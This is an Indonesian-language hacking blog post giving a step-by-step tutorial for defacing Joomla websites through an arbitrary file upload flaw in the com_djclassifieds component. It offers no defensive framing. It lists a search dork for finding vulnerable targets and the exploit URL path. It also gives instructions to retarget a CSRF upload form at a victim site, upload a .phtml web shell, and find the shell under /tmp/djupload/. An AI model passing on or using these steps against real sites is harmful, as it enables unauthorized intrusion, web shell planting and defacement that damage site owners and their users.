Breaking

Minggu, 02 Juni 2019

Exploit Joomla com_djclassifieds arbitrary file upload

Halo gaes gaes semuana h3h3, balik lagi sama admin gans tiada tanding👊😎. Hari ini admin gans ingin memberikan tutorial deface web yg ber cms Joomla dengan exploit com_djclassifieds - Arbitrary file upload, caranya cukup mudah langsung saja simak.

Dork: inurl:/com_djclassifieds
CSRF: Ada ibu ibu gaes
Exploit: index.php?option=com_djclassifieds&task=upload&tmpl=component

~ Pertama dorking dengan dork diatas
~ Pilih target lalu tempel exploitnya
Contoh: localhost/index.php?option=com_djclassifieds&task=upload&tmpl=component
~ Tampilan jika web nya vuln seperti ini
Jika tidak seperti itu berarti tidak vuln
~ Edit script CSRF nya, di bagian "target-mu.com" ganti dengan web target mu
~ Jika sudah buka CSRF nya di browser lalu upload shell kalian yg ber ekstensi phtml, ganti dulu gayn Ext Shell mu h3h3 (NB: Disarankan upload mini shell atau uploader dulu agar tidak pecah pecah)
~ Jika berhasil di upload tampilan akan sama seperti tampilan awal
~ Akses shell nya? Ada di localhost/tmp/djupload/upgan.phtml

Ingat! Gk 100% berhasil ya zeyenk santuy aja cari targetnya karena Tuhan menyukai hambanya yang santuy


Tidak ada komentar:

Posting Komentar